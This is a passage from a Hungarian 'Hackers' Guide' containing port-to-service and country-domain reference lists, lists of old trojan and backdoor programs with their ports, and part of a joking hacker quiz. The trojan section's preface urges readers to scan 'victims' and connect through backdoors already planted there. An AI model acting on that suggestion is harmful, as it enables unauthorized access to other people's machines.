Platform 1367=DCSdcs 1368=ScreenCastscreencast 1369=GlobalView to Unix Shell 1370=Unix Shell to GlobalView 1371=Fujitsu Config Protocol 1372=Fujitsu Config Protocol 1373=Chromagrafxchromagrafx 1374=EPI Software Systems 1375=Bytexbytex 1376=IBM Person to Person Software 1377=Cichlid License Manager 1378=Elan License Manager 1379=Integrity Solutions 1380=Telesis Network License Manager 1381=Apple Network License Manager 1382=udt os 1383=GW Hannaway Network License Manager 1384=Objective Solutions License Manager 1385=Atex Publishing License Manager 1386=CheckSum License Manager 1387=Computer Aided Design Software Inc LM 1388=Objective Solutions DataBase Cache 1389=Document Manager 1390=Storage Controller 1391=Storage Access Server 1392=Print Managericlpv-pm 1393=Network Log Server 1394=Network Log Client 1395=PC Workstation Manager software 1396=DVL Active Mail 1397=Audio Active Mail 1398=Video Active Mail 1399=Cadkey License Manager 1400=Cadkey Tablet Daemon 1401=Goldleaf License

Manager 91 Hackers’ Guide 1402=Prospero Resource Manager 1403=Prospero Resource Manager 1404=Infinite Graphics License Manager 1405=IBM Remote Execution Starter 1406=NetLabs License Manager 1407=DBSA License Manager 1408=Sophia License Manager 1409=Here License Manager 1410=HiQ License Manager 1411=AudioFileaf 1412=InnoSysinnosys 1413=Innosys-ACLinnosys-acl 1414=IBM MQSeriesibm-mqseries 1415=DBStardbstar 1416=Novell LU6.2novell-lu62 1417=Timbuktu Service 1 Port 1417=Timbuktu Service 1 Port 1418=Timbuktu Service 2 Port 1419=Timbuktu Service 3 Port 1420=Timbuktu Service 4 Port 1421=Gandalf License Manager 1422=Autodesk License Manager 1423=Essbase Arbor Software 1424=Hybrid Encryption Protocol 1425=Zion Software License Manager 1426=Satellite-data Acquisition System 1 1427=mloadd monitoring tool 1428=Informatik License Manager 1429=Hypercom NMSnms 1430=Hypercom TPDUtpdu 1431=Reverse Gosip Transport 1432=Blueberry Software License Manager 1433=Microsoft-SQL-Server

1434=Microsoft-SQL-Monitor 1435=IBM CISCibm-cics 1436=Satellite-data Acquisition System 2 1437=Tabulatabula 1438=Eicon Security Agent/Server 1439=Eicon X25/SNA Gateway 1440=Eicon Service Location Protocol 1441=Cadis License Management 1442=Cadis License Management 1443=Integrated Engineering Software 1444=Marcam License Management 1445=Proxima License Manager 1446=Optical Research Associates License Manager 1447=Applied Parallel Research LM 1448=OpenConnect License Manager 1449=PEportpeport 1450=Tandem Distributed Workbench Facility 92 Hackers’ Guide 1451=IBM Information Management 1452=GTE Government Systems License Man 1453=Genie License Manager 1454=interHDL License Manager 1454=interHDL License Manager 1455=ESL License Manager 1456=DCAdca 1457=Valisys License Manager 1458=Nichols Research Corp. 1459=Proshare Notebook Application 1460=Proshare Notebook Application 1461=IBM Wireless LAN 1462=World License Manager 1463=Nucleusnucleus 1464=MSL License Manager 1465=Pipes

Platform 1466=Ocean Software License Manager 1467=CSDMBASEcsdmbase 1468=CSDMcsdm 1469=Active Analysis Limited License Manager 1470=Universal Analytics 1471=csdmbasecsdmbase 1472=csdmcsdm 1473=OpenMathopenmath 1474=Telefindertelefinder 1475=Taligent License Manager 1476=clvm-cfgclvm-cfg 1477=ms-sna-server 1478=ms-sna-base 1479=dberegisterdberegister 1480=PacerForumpacerforum 1481=AIRSairs 1482=Miteksys License Manager 1483=AFS License Manager 1484=Confluent License Manager 1485=LANSourcelansource 1486=nms topo serv 1487=LocalInfoSrvr 1488=DocStordocstor 1489=dmdocbrokerdmdocbroker 1490=insitu-confinsitu-conf 1491=anynetgateway 1492=stone-design-1 1493=netmap lmnetmap lm 1494=icaica 1495=cvccvc 1496=liberty-lmliberty-lm 1497=rfx-lmrfx-lm 1498=Watcom-SQLwatcom-sql 1499=Federico Heinz Consultora 93 Hackers’ Guide 1500=VLSI License Manager 1501=Satellite-data Acquisition System 3 1502=Shivashivadiscovery 1503=Databeamimtc-mcs 1504=EVB Software Engineering License Manager 1505=Funk

Software, Inc. 1524=ingres 1525=oracle 1525=Prospero Directory Service non-priv 1526=Prospero Data Access Prot non-priv 1527=oracletlisrv 1529=oraclecoauthor 1600=issd 1651=proshare conf audio 1652=proshare conf video 1653=proshare conf data 1654=proshare conf request 1655=proshare conf notify 1661=netview-aix-1netview-aix-1 1662=netview-aix-2netview-aix-2 1663=netview-aix-3netview-aix-3 1664=netview-aix-4netview-aix-4 1665=netview-aix-5netview-aix-5 1666=netview-aix-6netview-aix-6 1986=cisco license management 1987=cisco RSRB Priority 1 port 1988=cisco RSRB Priority 2 port 1989=cisco RSRB Priority 3 port 1989=MHSnet systemmshnet 1990=cisco STUN Priority 1 port 1991=cisco STUN Priority 2 port 1992=cisco STUN Priority 3 port 1992=IPsendmsgipsendmsg 1993=cisco SNMP TCP port 1994=cisco serial tunnel port 1995=cisco perf port 1996=cisco Remote SRB port 1997=cisco Gateway Discovery Protocol 1998=cisco X.25 service (XOT) 1999=cisco identification port 2009=whosockami 2010=pipe server

2011=raid 2012=raid-ac 2013=rad-am 2015=raid-cs 2016=bootserver 2017=terminaldb 2018=rellpack 2019=about 94 Hackers’ Guide 2019=xinupageserver 2020=xinupageserver 2021=xinuexpansion1 2021=down 2022=xinuexpansion2 2023=xinuexpansion3 2023=xinuexpansion4 2024=xinuexpansion4 2025=xribs 2026=scrabble 2027=shadowserver 2028=submitserver 2039=device2 2032=blackboard 2033=glogger 2034=scoremgr 2035=imsldoc 2038=objectmanager 2040=lam 2041=interbase 2042=isis 2043=isis-bcast 2044=primsl 2045=cdfunc 2047=dls 2048=dls-monitor 2065=Data Link Switch Read Port Number 2067=Data Link Switch Write Port Number 2201=Advanced Training System Program 2500=Resource Tracking system server 2501=Resource Tracking system client 2564=HP 3000 NS/VT block mode telnet 2784=world wide web - development 3049=ccmail 3264=ccmail, cc:mail/lotus 3333=dec-notes 3984=MAPPER network node manager 3985=MAPPER TCP/IP server 3986=MAPPER workstation server 3421=Bull Apprise portmapper 3900=Unidata UDT OS 4132=NUTS

Daemonnuts dem 4133=NUTS Bootp Server 4343=UNICALL 4444=KRB524 4672=remote file access server 5002=radio free ethernet 5010=TelepathStarttelelpathstart 5011=TelepathAttack 5050=multimedia conference control tool 95 Hackers’ Guide 5145=rmonitor secure 5190=aol, America-Online 5300=HA cluster heartbeat 5301=hacl-gs # HA cluster general services 5302=HA cluster configuration 5303=hacl-probe HA cluster probing 5305=hacl-test 6000-6063=x11 X Window System 6111=sub-process HP SoftBench Sub-Process Control 6141/=meta-corp Meta Corporation License Manager 6142=aspentec-lm Aspen Technology License Manager 6143=watershed-lm Watershed License Manager 6144=statsci1-lm StatSci License Manager - 1 6145=statsci2-lm StatSci License Manager - 2 6146=lonewolf-lm Lone Wolf Systems License Manager 6147=montage-lm Montage License Manager 7000=afs3-fileserver file server itself 7001=afs3-callback callbacks to cache managers 7002=afs3-prserver users & groups database 7003=afs3-vlserver volume

location database 7004=afs3-kaserver AFS/Kerberos authentication service 7005=afs3-volser volume managment server 7006=afs3-errors error interpretation service 7007=afs3-bos basic overseer process 7008=afs3-update server-to-server updater 7009=afs3-rmtsys remote cache manager service 7010=ups-online onlinet uninterruptable power supplies 7100=X Font Service 7200=FODMS FLIP 8010=Wingate 8181=IMail 9535=man * Nemzetközi domain-ek Az alábbi listátSiRiUskészítette. Nézzétek meg az o webhelyüket is:http://forbidden.net-securityorg Afghanistan .af Albania .al Algeria .dz America Samoa .as Andorra .ad Angola .ao 96 Hackers’ Guide Anguilla .ai Antarctica .aq Antigua .ag Argentina .ar Armenia .am Aruba .aw Australia .au Austria .at Azerbaijan .az Bahamas .bs Bahrain .bh Bangladesh .bd Barbados .bb Belarus .by Belgium .be Belize .bz Benin .bj Bermuda .bm Bhutan .bt Bolivia .bo Bosnia-Hercegovina .ba Botswana .bw Bouvet Island .bv Brazil .br British Indian Ocean .io Brunei

Darussalam .bn Bulgaria .bg Burkina Faso .bf Burundi .bi Cambodia .kh Cameroon .cm Canada .ca Cape Verde .cv Caymen Islands .ky Central African Republic .cf Chad .td Chile .cl China .cn Christmas Island .cx Cocos Islands .cc Colombia .co Comoros .km Congo .cg Cook Island .ck Costa Rica .cr Cote dIvoire(Ivory Coast) .ci Croatia .hr Cuba .cu Cyprus .cy Czech Republic .cz 97 Hackers’ Guide Denmark .dk Djibouti .dj Dominica .dm Dominican Republic .do East Timor .tp Ecuador .ec Egypt .eg El Salvador .sv Equatorial Guinea .gp Estonia .ee Ethiopia .et Falkland Islands .fk Faroe Islands .fo Fiji .fj Finland .fi France .fr French Guiana .gf French Polynesia .pf French Southern Territories .tf Gabon .ga Gambia .gm Georgia(Not the state!) .ge Germany .de Ghana .gh Gibraltar .gi Greece .gr Greenland .gl Grenada .gd Guadeloupe .gp Guam .gu Guatemala .gt Guinea .gn Guinea-Bissau .gw Guyana .gy Haiti .ht Heard & McDonald Islands .hm Honduras .hn Hong Kong .hk Hungary .hu Iceland .is India

.in Indonesia .id Iran .ir Iraq .iq Ireland .ie Israel .il Italy .it Jamaica .jm Japan .jp Jordan .jo 98 Hackers’ Guide Kazakhstan .kz Kenya .ke Kiribati .ki Korea(North) .kp Korea(South) .kr Kuwait .kw Kyrgyzstan .kg Lao Peoples Democratic Republic .la Latvia .lv Lebanon .lb Lesotho .ls Liberia .lr Libyan Arab Jamahiriyan(Libya).ly Liechtenstein .li Lithuania .lt Luxembourg .lu Macau .mo Madagascar .mg Malawi .mw Malaysia .my Maldives .mv Mali .ml Malta .mt Marshall Islands .mh Martinique .mq Mauritania .mr Mauritius .mu Mexico .mx Micronesia .fm Moldovia .md Manaco .mc Mongolia .mn Montserrat .ms Morocco .ma Mozambique .mz Myanmar .mm Namibia .na Nauru .nr Nepal .np Netherlands .nl Dutch West Indies .an Neutral Zone .nt New Caledonia .nc New Zealand .nz Nicaragua .ni Niger .ne Nigeria .ng Niue .nu Norfolk Island .nf North Mariana Islands .mp 99 Hackers’ Guide Norway .no Oman .om Pakistan .pk Palau .pw Panama .pa Papua New Guinea .pg Paraguay .py Peru .pe Philippines

.ph Pitcairn Island .pn Poland .pl Portugal .pt Puerto Rico .pr Qatar .qa Reunion Island .re Romania .ro Russian Federation .ru Rwanda .rw St. Helena sh St. Kitts and Nevis kn St. Lucia lc St. Pierre and Miquelon pm St. Vincent vc Samoa .ws San Marino .sm Sao Tome .st Saudi Arabia .sa Senegal .sn Seychelles .sc Sierra Leone .sl Singapore .sg Slovak Republic .sk Slovenia .si Solomon Islands .sb Somalia .so South Africa .za Spain .es Sri Lanka .lk Sudan .sd Suriname .sr Svalbard .sj Swaziland .sz Sweden .se Switzerland .ch Syrian Arab Republic .sy Taiwan .tw Tajkistan .tj Tanzania .tz Thailand .th Togo .tg 100 Hackers’ Guide Tokelau .tk Tonga .to Trinidad and Tobago .tt Tunisia .tn Turkey .tr Turkmenistan .tm Turks and Caicos Islands .tc Tuvalu .tv Uganda .ug Ukraine .ua United Arab Emirates .ae United Kingdom .uk United States .us Uruguay .uy Uzbekistan .uz Vanuatu .vu Vatican City .va Venzuela .ve Vietnam .vn Virgin Islands(British) .vg Virgin Islands(U.S) vi Wallis and Fortuna

Islands .wf Western Sahara .eh Yamen .ye Yugoslavia .yu Zaire .zr Zambia .zm Zimbabwe .zw * A legismertebb trojai programok és portjaik I. Reményeim szerint az összes itt felsorolt port cím passzol az adott trojan programhoz. Ha mondjuk portscannerrel letapogatod az áldozatot gépét és a felsoroltak egyikét (mármint a portokét) nyitva találod, akkor az adott trojannal egybol kapcsolódhatsz a lamer gépéhez, ugyanis már valaki megelozött. Megpróbáltam úgy rendezni, hogy elore raktam a port címet növekvo sorrendben, majd utána az aktuális trojan program nevét! Jó csemegézést és sikeres hackelést! Összedobta: Nestan 121 456 555 BO jammerkillahV Hackers Paradise Stealth Spy 101 Hackers’ Guide 555 666 1001 1001 1011 1033 1170 1170 1234 1243 1245 1245 1245 1245 1492 1509 1600 1807 1981 1999 2001 2023 2023 2115 2140 2140 2565 2583 2801 2801 3700 4092 4590 5000 5001 5321 5400 5401 5402 5569 5742 6400 6670 6939 6969 6969 6969 7000 7300 7301 102 Phase0

Attack FTP, Satanz Backdoor Silencer WebEx Doly Trojan Netspy Psyber Stream Server Streaming Audio Trojan Ultors Trojan SubSeven VooDoo Doll GabanBus NetBus Vodoo FTP99CMP Psyber Streaming Server Shivka-Burka SpySender Shockrave BackDoor Trojan Cow Ripper Pass Ripper Bugs Deep Throat The Invasor Striker Wincrash2 Phineas Phineas Phucker Portal of Doom WinCrash ICQTrojan Sockets de Troie Sockets de Troie 1.x Firehotcker Blade Runner Blade Runner 1.x Blade Runner 2.x Robo-Hack Wincrash The tHing DeepThroat Indoctrination GateCrasher Priority Gatecrasher Remote Grab NetMonitor NetMonitor 1.x Hackers’ Guide 7306 7306 7307 7308 7789 7789 9872 9873 9874 9875 9875 9989 10067 10167 11000 11223 12076 12223 12346 12361 12362 16969 20000 20001 20034 20034 21544 22222 23456 23456 23456 26274 30100 30129 30303 30999 31337 31338 31338 31339 31339 31666 33333 34324 34324 34324 40412 40421 40422 40423 NetMonitor 2.x NetMonitor NetMonitor 3.x NetMonitor 4.x ICKiller ICQKiller Portal of Doom

Portal of Doom 1.x Portal of Doom 2.x Portal of Doom 3.x Portal of Doom iNi-Killer Portal of Doom 4.x Portal of Doom 5.x Senna Spy ProgenicTrojan Gjamer Hack?99 KeyLogger NetBus 1.x Whack-a-mole Whack-a-mole 1.x Priority Millenium Millennium NetBus 2 Pro NetBus Pro GirlFriend Prosiak Evil FTP Ugly FTP WhackJob Delta NetSphere Masters Paradise Socket23 Kuang Back Orifice Back Orifice DeepBO NetSpy DK NetSpy DK BOWhack Prosiak BigGluck Tiny Telnet Server BigGluck The Spy Masters Paradise Masters Paradise 1.x Masters Paradise 2.x 103 Hackers’ Guide 40423 40426 50505 50766 53001 61466 65000 Master Paradise Masters Paradise 3.x Sockets de Troie Fore, Schwindler Remote Windows Shutdown Telecommando Devil * A legismertebb trojai programok és portjaik II. port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email pw Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy port 31 - Hackers Paradise port

80 - Executor port 456 - Hackers Paradise port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Satanz Backdoor port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1245 - VooDoo Doll port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4590 - ICQTrojan port 5000 - Sockets de Troie 104 Hackers’ Guide port 5001 - Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5569 - Robo-Hack port 5742 - WinCrash port 6670 - DeepThroat port 6771 - DeepThroat port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 -

NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack99 KeyLogger port 12345 - GabanBus, NetBus port 12346 - GabanBus, NetBus port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 - Delta port 31337 - Back Orifice port 31338 - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 - Delta 105

Hackers’ Guide port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 61466 - Telecommando port 65000 - Devil ViDe0 (Joakim írásai alapján) * BUHERÁTOR TESZT 1.1 (C) Felix Lee, John Hayes and Angela Thomas, 1989 Magyar változat: Mörk Péter, 1994, 1995 Értékelés: minden "igen" egy pontot ér. 0x000 és 0x010 között: lamer 0x010 és 0x040 között: felhasználó 0x040 és 0x080 között: operátor 0x080 és 0x0C0 között: számítógépbuzeráns 0x0C0 és 0x100 között: buherátor 0x100 és 0x180 között: mester 0x180 és 0x200 között: varázsló Megjegyzés: ha nem érted a pontozást, akkor itt hagyd abba!!! 1.Használtál már számítógépet? 2.négy óránál tovább egyfolytában? 3. nyolc óránál tovább? 4. tizenhat óránál tovább? 5. harminckét óránál tovább? 6.Lyukasztottál valaha lyukszalagot? 7.Mulasztottál el órát, mert helyette programoztál? 8.Mulasztottál-e vizsgát? 9.Mulasztottál-e

esküvőt? 10.a saját esküvődet? 11.Programoztál már részegen? 12.a programod másnap is működött? 13.Irtál már valaha repülésszimulátort? 14.Szedted már szét a számítógépedet? 15.Megváltoztattad valaha a 4 értékét? 16.véletlenül? 106 Hackers’ Guide 17.Fortran nyelven kívül más nyelvben is? 18.Adtál nevet a számítógépednek? 19.Felháborodsz, mikor kijavítják egy rendszer egy olyan hibáját, amit te eddig kihasználtál saját céljaidra? 20.Szoktál monitor előtt ülve enni? 21.aludni? 22.Tudod napra pontosan, hogy milyen idős vagy? 23.Próbáltál már valaha telefonon keresztül pizzát letölteni? 24.Találtál már ki számítógépes viccet? 25.Akadt olyan, aki nem értette meg? 26.Tudsz idézni kedvenc számítástechnikai szakkönyvedből? 27. visszafelé is? 28.Láttad a "Terminátor"-t? 29.Láttad a "Csillagok háborújá"-t ? 30.Láttad a "Jurassic Park"-ot? 31.Tudod mit jelent az ASCII rövidítés?

32. az EBCDIC? 33.El tudod olvasni a hexában vagy oktálisan megadott ASCII kódot? 34.Tudod az összes ASCII vezérlőkód nevét? 35.Tudsz EBCDIC kódot hexában írni és olvasni? 36.Tudsz EBCDIC-ből ASCII-ba és vissza konvertálni? 37.Tudod, hogy mely karakterek kódjai egyeznek meg ASCII-ban és EBCDIC-ben? 38.Tudod, hogy a gépeden mekkora a legnagyobb ábrázolható egész szám? 39.Hoztál már létre saját aritmetikai könyvtárat, hogy nagyobb pontosságot érj el? 40.Fel tudod sorolni kettő első tizenhat hatványát tetszőleges sorrendben? 41. harminckettedik hatványig? 42. hatvannegyedik hatványig? 43.Tudsz ránézéssel lyukkártyát olvasni? 44.és tapintással? 45.Módosítottad már egy program bináris kódját? 46.a program futása közben? 47.Használtál már overlay programokat? 48.Találkoztál már valamilyen IBM vagy Microsoft nagyfőnökkel? 49.Ismered valamelyik fejlesztőmérnöküket? 50.Fényképeztél már monitort? 51.Néztél már videót a

számítógéped monitorán? 52.Szkenneltél már képet? 53.Optimalizáltál már üres ciklust? 54.Irtál már buborék rendezőprogramot? 55.Szokott beszélni hozzád a számítógéped? 56.és te hozzá? 57.Beszélgettél már modemmel? 58.válaszolt is? 59.Tudsz 1200 bauddal fütyülni? 60. és 14400-zal? 61.El tudsz fütyülni egy tone telefonszámot? 62.Láttál már közvetlen közelről rendszerösszeomlást? 63.te okoztad? 64.Tudsz ciklikus puffert írni? 107 Hackers’ Guide 65.Tudod mi a ciklikus puffer? 66.Szoktál zenélni a sornyomtatóddal? 67. a diszk meghajtóddal? 68. a streamereddel? 69.Van Snoopy falinaptárad? 70. lejárt? 71.Van karakterekből összerakott képed 72. Mona Lisáról? 73. a vállalatodról? 74. Einsteinről? 75. magadról? 76.Készítettél már karakterekből összerakott képet? Tudod, hogy mit jelentenek ezek a rövidítések? 77. DASD 78. Emacs 79. ITS 80. RSTS/E 81. SNA 82. Spool 83. TCP/IP 84. NFS? 85. IP? 86. SMTP? 87. IRC? 88.

CSMA/CD? 89. DNS? Használtad már ezeket a programokat? 90. TPU? 91. TECO? 92. Emacs? 93. ed? 94. vi? 95. Xedit (in VM/CMS)? 96. SOS? 97. EDT? 98. Wordstar? 99.Irtál már CLIST-et? Programoztál már. 100. X windowban? 101. CICS-ben? 102.Kaptál már fénymásolt vagy telefaxon elküldött mágneslemezt? 103.Mutattad már meg kezdőnek, hogy hol van az általuk keresett gomb? 104.a főkapcsoló volt az? 108 Hackers’ Guide Tagja voltál-e valaha az alábbi szervezetek valamelyikének? 105. HT-1080 Z szakkör? 106. C-64 szakkör? 107. OS/2 klub? 108. Microsoft felhasználók baráti köre? 109. Számítógép Gyűlölők társasága? 110.Voltál már tagja valamilyen szabványügyi csoportnak? 111.Debuggoltál már gépi kódú programot telefonon keresztül? 112.Kaptál már hangos levelet? 113.el tudtad olvasni? 114.Szoktál keresztrejtvényt fejteni számítógépen futó szótár segítségével? 115.Megcsináltad már a Turing tesztet? 116.megbuktál? 117.Ejtettél már el

egy teli doboz lyukkártyát? 118. utána vissza tudtad rakni őket helyes sorrendbe? 119. ránézés nélkül? 120.Használtál valaha IPCS-t? 121.Kerestél már pénzt a számítógéped segítségével? 122.Futurista színűre van festve a számítógéped háza? 123.Kapcsoltál már ki valaha szünetmentes tápegységet? 124.Maszkoltad már valaha az NMI-t? 125.Hoztad már véletlenül működésbe a tűzoltó rendszert? 126. szándékosan? 127. és még mindig ugyanott dolgozol? 128.Megnyomtad már valaha a tápfeszültség vészkikapcsolóját? 129. szándékosan? 130.Van a birtokodban kipusztult szoftver vagy hardver dokumentációja? 131. még most is szoktad olvasgatni? 132.Fejtettél már vissza gépi kódú programot? 133. találtál benne hibákat? 134.Segítettél már a boltban az eladónak a számlázó számítógép kezelésében? 135.Próbáltál már telefonkártyát hamisítani? 136.hitelkártyát? 137.Ejtettél már le számítógépet több mint két emelet

magasságból? 138.Javítottál már ki olyan szoftver hibát, aminek a létezését a gyártó nem ismerte el? 139.Javítottál már ki hardver hibát szoftverből? 140. és fordítva? 141.Tagja voltál már valaha valamilyen felhasználói/tanácsadói csoportnak? 142.Hivatkoztak már rád valamilyen számítógépes hobby újságban? 143.Irtak már valamilyen tettedről az újságok? 144. megúsztad? 145.Irtál már program kommentet nem az anyanyelveden? 146.Tettél már tönkre hardver eszközt szoftverből? 147.Próbáltál már javítani a "Buherátor teszt" eredményeden? 148.Viszel magaddal kinyomtatott programlistákat az ebédhez? 149.az ágyba? 150.Javítottál már mikrokernel hibát? 151. kernel hibát? 109 Hackers’ Guide 152.Szoktál Turing gépet programozni? 153.Tudsz fejben postfixről prefixre alakítani? 154.Tudsz fejben hexából oktálisra konvertálni? 155.két számot összeszorozni? 156.Éheztél már miközben az "Ebédelő

filozófusok" problémát próbáltad megoldani? 157.Megoldottad már a párhuzamos folyamatok leállításának problémáját? 158.helyesen? 159.Kerültél már deadlock-ba spagetti evés közben? 160.Irtál már önreprodukáló programot? 161.Kiswappelted már valaha memóriából a swapper programot? 162.Tudsz állapotdiagramot olvasni? 163. szükséged is van rá? 164.Irtál már leállíthatatlan programot? 165.szándékosan? 166.Őrzöl otthon vírusmintákat? 167.Gyorsítottál már fel számítógépet úgy, hogy kivettél egy jumpert? Tudod, hogy. 168.Tudod, hogy mi a mérnöki pult? 169. használni is tudod? 170.Tudod, hogy milyen a ferrit-gyűrűs memória? 171.Tudod mit jelent a HCF? 172. Használtad már? 173. szándékosan? 174.Tudod mi a lyukkártya? 175.csináltál már valaha? 176.Változtattál már kedvenc programnyelveden? 177. Ujraírtad emiatt kedvenc programjaidat? 178. Tudod, mi a Gray kód? 179.Tudod mi a különbség a DTE és a DCE között? 180.Tudod

fejből az RS-232C csatlakozó kiosztását? 181.Be tudsz huzalozni egy RS-232 csatlakozót behunyott szemmel? MEGVAN NEKED. 182.Megvan neked a "nemhivatalos mosolyszótár"? 183.Megvan neked az "aboszlut" viccek gyűjteménye? 184.Megvan neked az "Igazi Programozó" című írás? 185.és mégis Pascalban programozol? 186.Van folyamatábra rajzoló sablonod? 187. a fiókod mélyén porosodik? 188.Van saját Murphy-törvény vagy graffiti gyűjteményed? 189.Van számítógépes szakácskönyved? 190. próbáltál már megfőzni belőle valamit? 191.Van telefonmodemed? 192.terminálod? 193.játék számítógéped? 194.PC-d? 195.munkaállomásod? 110 Hackers’ Guide 196.mainframe-d? 197.szuperszámítógéped? 198.hypercube-od vagy CRAY II-d? 199.nyomtatód? 200.lézernyomtatód? 201.streamered? 202.A/0-ás plottered? 203.Van programozható zsebszámológéped? 204. inverz lengyel logikás? 205.Volt már valaha több mint egy számítógéped? 206.

több mint négy? 207. több mint tizenhat? 208.Van otthon X25 vonalad? 209.digitális telefonvonalad? 210.Van külön telefonvonalad a számítógéped számára? 211.legális? 212.Van hangkártyád? 213.MIDI billentyűzeted? 214.kettőnél több merevlemezed? 215.A programjaid meghaladják a 16 megabyte-ot? 216.256 megabyte-ot? 217.1 gigabyte-ot? 218.16 gigabyte-ot? 219.256 gigabyte-ot? 220.1 terabyte-ot? 221.Van CD ROM olvasód? 222.Van saját streamer kazetta gyűjteményed? 223.a kazetták címkézetlenek? 224.Több mint 16 darab mágneslemezed van? 225.több mint 64? 226.több mint 256? 227.több mint 1024? 228.Van 8 collos lemezed? 229.Van a gépedben 5,25 collos lemezmeghajtó? 230.kettőnél több? 231.Megvan neked "A számítógép programozás művészete" című könyv valamelyik kötete? 232.végigcsináltad az összes gyakorlatát? 233.fel tudod sorolni a meg nem írt kötetek címét? 234.Tudsz idézni az "Igazi programozó"-ból? 235.részt vettél

az OS/360 projectben? 236.Van TTL atlaszod? 237.Van három évnél régebben kinyomtatott programlistád? 238.Kinyomtatott Linux dokumentációd? MUNKA 239.Van munkád? 240.volt valaha munkád? 241.számítógéppel kapcsolatos (volt)? 111 Hackers’ Guide 242.Szoktál szokatlan időpontokban dolgozni? 243.Voltál már rendszergazda? 244.Több megabyte-od van mint megaforintod? 245.Elhagytad már valaha az állásodat azért, hogy jobb számítógépek közelébe kerülj? 246.Bebiztosított munkahelyed van? 247.van kódod is, amivel bebiztosítottad? 248.Estél már át biztonsági ellenőrzésen? 249.megúsztad? JÁTÉKOK 250.Értél el helyezést az iskolai Galaxy bajnokságon? Játszottál valaha 251.Impossible Mission-t? 252.Tetrist? 253.Alley Cat-et? 254.Block Out-ot? 255.Doom-ot? 256.Larry-t? 257.MUD-ot? 258.Irtál már kalandjátékot? 259.real-time játékot? 260.több játékost kezelő játékot? 261.hálózatos játékot? HARDVER 262.Használtál már fényceruzát?

263. saját gyártmányú volt? Használtál valaha 264.konzolírógépet? 265.lyukszalagot? 266.írógépet? 267.kártyaolvasót/lyukasztót? 268.digitalizáló táblát? Építettél valaha. 269.ZX-81-et? 270.Spectrumot? Tudod hogyan kell használni a(z) 271.oszcilloszkópot? 272.voltmérőt? 112 Hackers’ Guide 273.frekvenciamérőt? 274.logikai szintjelzőt? 275.wirewrap pisztolyt? 276.forrasztó pákát? 277.logikai analizátort? 278.Terveztél már LSI chipet? 279.le is gyártották? 280.működött is? 281.Marattál már nyomtatott áramkört? TÖRTÉNELEM 282.Vittél már be boot kódot a mérnöki pultról? 283.a memóriából? 284.tudsz Eniac-ot programozni? 285.Láttál már 90 oszlopos lyukkártyát? 286.Szoktál IBM termékazonosító számokkal álmodni? 287.Tudod mit jelent az IBM 7320154 azonosító száma? 288.Megérted az 3270 adatformátumot? 289.Sikerült már mágneslemezről felbootolnod egy IBM gépet? PROGRAMOZÁSI NYELVEK 290.Több mint négy

programozási nyelvet ismersz? 291. több mint nyolcat? 292. tizenhatot? 293. harmickettőt? 294.Terveztél már programozási nyelvet? 295.Tudod mit jelent a Basic? 296. Pascal? 297.Tudsz Basicben programozni? 298.mások előtt is beismered? 299.Tudsz Cobolban programozni? 300.Elvből nem programozol Cobolban? 301.Ismered a Pascalt? 302. Modula-2? 303. Oberon? 304. Kettőnél több Wirth által kitalált nyelvet? 305.tudod idézni Nicklaus Wirth valamelyik aforizmáját? 306.Ismered az Algol-60-t? 307. Algol-W? 308. Algol-68? 309. Megértesz egy Algol-68 hibalistát? 310.Szereted a kétszintű szintaktikai ellenőrzést? 311.Tudsz gépi kódban programozni legalább két különféle processzort? 312. négy különféle processzort? 313. nyolc különféle processzort? Ismered az alábbi nyelvek valamelyikét? 113 Hackers’ Guide 314. APL? 315. Ada? 316. BCPL? 317. C++? 318. C? 319. Comal? 320. Eiffel? 321. Forth? 322. Fortran? 323. Hypertalk? 324. Icon? 325. Lisp? 326. Logo?

327. MIIS? 328. MUMPS? 329. PL/I? 330. Pilot? 331. Plato? 332. Prolog? 333. RPG? 334. Rexx (or ARexx)? 335. SETL? 336. Smalltalk? 337. Snobol? 338. Occam 339. SQL? 340. bármilyen assembly nyelvet? 341.Beszélsz VT-100-ul? 342. Postscriptül? 343. SMTP-ül? 344. UUCP-ul? 345. angolul? MIKROSZÁMITOGÉPEK 346.Másoltál már másolásvédett lemezt? 347.Dolgoztál már ki másolásvédelmi módszert? 348.Készítettél már nem szabványosan formázott mágneslemezt? 349.Állítottál már vissza adatokat megsérült lemezről? 350.Bootoltál már csupasz lemezről? HÁLÓZATOK 351.Előfordult már, hogy egyszerre két külön időzónában lévő gépre is be voltál jelentkezve? 352.Tudod fejből az országod gerinchálózatának térképét? 353.mindegyik országét? 354.Találtál már hibát a sendmail programban? 355. Az adatok titkosságát érintő hiba volt? 356.Tudod fejből a gépetek HOSTSTXT táblázatát? 114 Hackers’ Guide 357.a legutóbbi változatot is? 358.Fel

